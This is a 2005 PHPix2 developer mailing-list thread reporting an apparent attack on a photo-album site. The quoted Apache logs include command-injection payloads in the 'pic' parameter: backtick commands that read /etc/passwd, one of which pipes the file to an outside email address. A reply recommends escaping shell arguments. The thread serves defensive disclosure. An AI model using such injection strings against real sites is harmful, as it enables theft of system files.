Re: [PHPix2-devel] WARNING, attempt of abuse of PHPix

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

I downloaded the latest release of PHPix2 and tried a few things to
execute shell code.  I was unable to run anything, but I=E2=80=99m not conv=
inced
it=E2=80=99s safe.  One of the reasons I now generate static HTML for my ph=
oto
albums is so I don=E2=80=99t have to worry about this sort of thing.

It looks like this person was just trying things out by hand.  Do you
see any mail to this address in your mail server logs?

Recent versions of PHP have a built-in function to escape strings for
shell commands.  This should be done in the showpic.php:CreateImage
function, just before the call to system.

Neale

LT-P <LT...@LT...> writes:

> Looking into my apache logs, I found this:
> ___
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:06 +0100] "GET /albu=
ms/?mode=3Dalbum&album=3DDivers&dispsize=3D800&start=3D0 HTTP/1.1" 200 5348=
 "http://www.google.de/search?hl=3Dde&q=3Dintext%3AGenerated.by.PHPix+2.0.3=
%3F+inurl%3A%24mode%3Dalbum&meta=3D" "Mozilla/4.0 (compatible; MSIE 6.0; Wi=
ndows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:07 +0100] "GET /albu=
ms/style.css HTTP/1.1" 200 2137 "http://83.192.28.223/albums/?mode=3Dalbum&=
album=3DDivers&dispsize=3D800&start=3D0" "Mozilla/4.0 (compatible; MSIE 6.0=
; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:09 +0100] "GET /albu=
ms/showpic.php?album=3DDivers&dispsize=3D100&user=3D&pic=3DDSC00039.JPG&wid=
th=3D75&height=3D100&mode=3Dalbum HTTP/1.1" 200 7562 "http://83.192.28.223/=
albums/?mode=3Dalbum&album=3DDivers&dispsize=3D800&start=3D0" "Mozilla/4.0 =
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1=
.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:10 +0100] "GET /CSS/=
ltpnet-black.css HTTP/1.1" 200 4999 "http://83.192.28.223/albums/?mode=3Dal=
bum&album=3DDivers&dispsize=3D800&start=3D0" "Mozilla/4.0 (compatible; MSIE=
 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:11 +0100] "GET /albu=
ms/showpic.php?album=3DDivers&dispsize=3D100&user=3D&pic=3DDSC00040.JPG&wid=
th=3D75&height=3D100&mode=3Dalbum HTTP/1.1" 200 7859 "http://83.192.28.223/=
albums/?mode=3Dalbum&album=3DDivers&dispsize=3D800&start=3D0" "Mozilla/4.0 =
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1=
.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:12 +0100] "GET /albu=
ms/blank.gif HTTP/1.1" 200 43 "http://83.192.28.223/albums/?mode=3Dalbum&al=
bum=3DDivers&dispsize=3D800&start=3D0" "Mozilla/4.0 (compatible; MSIE 6.0; =
Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:13 +0100] "GET /albu=
ms/showpic.php?album=3DDivers&dispsize=3D100&user=3D&pic=3DDSC00041.JPG&wid=
th=3D100&height=3D75&mode=3Dalbum HTTP/1.1" 200 7978 "http://83.192.28.223/=
albums/?mode=3Dalbum&album=3DDivers&dispsize=3D800&start=3D0" "Mozilla/4.0 =
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1=
.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:20 +0100] "GET /albu=
ms/?mode=3Dalbum&album=3DDivers&pic=3D`cat%20/etc/passwd`&dispsize=3D640&st=
art=3D0 HTTP/1.1" 200 5480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows =
NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
> ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:49 +0100] "GET /albu=
ms/?mode=3Dalbum&album=3DDivers&pic=3D`cat%20/etc/passwd%20|%20mail%20winde=
xi...@gm...`&dispsize=3D640&start=3D0 HTTP/1.1" 200 5517 "-" "Mozilla/4.=
0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1=
.1.4322)"
> ___
>
> The email (win...@gm...) is a real one, with a person answering.
>
> I checked the executed PHPix code used during this attack and did some te=
sts. It /seems/ to be ok, the PHPix engine is (probably ?) safe on this poi=
nt.
> But I think it could be a Good Idea to revue the entire code and to look =
for potential abuse possibilities.
>
> Regards,
> 	LT-P
>
> --=20
> Seals are cute, kiss them
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by: IntelliVIEW -- Interactive Reporting
> Tool for open source databases. Create drag-&-drop reports. Save time
> by over 75%! Publish reports on the web. Export to DOC, XLS, RTF, etc.
> Download a FREE copy at http://www.intelliview.com/go/osdn_nl
> _______________________________________________
> PHPix2-devel mailing list
> PHP...@li...
> https://lists.sourceforge.net/lists/listinfo/phpix2-devel
>
> !DSPAM:41fad1e0149709130315537!